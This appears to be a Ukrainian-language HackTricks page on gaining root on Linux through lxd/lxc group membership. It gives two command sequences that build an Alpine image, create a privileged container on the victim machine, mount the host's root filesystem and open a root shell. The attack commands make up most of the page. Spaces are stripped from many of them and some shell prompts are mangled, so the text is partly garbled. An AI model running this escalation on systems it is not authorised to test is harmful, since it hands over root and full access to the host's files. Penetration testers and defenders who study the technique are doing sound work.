Поділіться своїми хакерськими трюками, надсилайте PR доHackTricksіHackTricks Cloudрепозиторіїв на GitHub.
Якщо ви належите до групи lxdабоlxc, ви можете стати root
Використання без Інтернету
Метод 1
Ви можете встановити на свій комп'ютер цей засіб для побудови дистрибутива: https://github.com/lxc/distrobuilder (дотримуйтесь інструкцій на GitHub):
sudosu#Install requirementssudoaptupdatesudoaptinstall-ygitgolang-godebootstraprsyncgpgsquashfs-tools#Clone repogitclonehttps://github.com/lxc/distrobuilder#Make distrobuildercddistrobuildermake#Prepare the creation of alpinemkdir-p $HOME/ContainerImages/alpine/cd $HOME/ContainerImages/alpine/wgethttps://raw.githubusercontent.com/lxc/lxc-ci/master/images/alpine.yaml#Create the containersudo $HOME/go/bin/distrobuilderbuild-lxdalpine.yaml-oimage.release=3.18
Завантажте файли lxd.tar.xz та rootfs.squashfs, додайте зображення до репозиторію та створіть контейнер:
lxcimageimportlxd.tar.xzrootfs.squashfs--aliasalpine# Check the image is therelxcimagelist# Create the containerlxcinitalpineprivesc-csecurity.privileged=true# List containerslxclistlxcconfigdeviceaddpriveschost-rootdisksource=/path=/mnt/rootrecursive=true
Якщо ви знайшли цю помилку Помилка: Сховище не знайдено. Будь ласка, створіть нове сховище
Виконайте lxd init і повторіть попередній фрагмент команд
Нарешті ви можете запустити контейнер і отримати root:
lxcstartprivesclxcexecprivesc/bin/sh[email protected]:~# cd /mnt/root #Here is where the filesystem is mounted
Метод 2
Побудуйте образ Alpine та запустіть його, використовуючи прапорець security.privileged=true, що змусить контейнер взаємодіяти як root з файловою системою хоста.
# build a simple alpine imagegitclonehttps://github.com/saghul/lxd-alpine-buildercdlxd-alpine-buildersed -i 's,yaml_path="latest-stable/releases/$apk_arch/latest-releases.yaml",yaml_path="v3.8/releases/$apk_arch/latest-releases.yaml",' build-alpine
sudo./build-alpine-ai686# import the imagelxc image import ./alpine*.tar.gz --alias myimage # It's important doing this from YOUR HOME directory on the victim machine, or it might fail.
# before running the image, start and configure the lxd storage pool as defaultlxdinit# run the imagelxcinitmyimagemycontainer-csecurity.privileged=true# mount the /root into the imagelxcconfigdeviceaddmycontainermydevicedisksource=/path=/mnt/rootrecursive=true# interact with the containerlxcstartmycontainerlxcexecmycontainer/bin/sh
lxcinitubuntu:16.04test-csecurity.privileged=truelxcconfigdeviceaddtestwhateverdisksource=/path=/mnt/rootrecursive=truelxcstarttestlxcexectestbash[email protected]:~# cd /mnt/root #Here is where the filesystem is mounted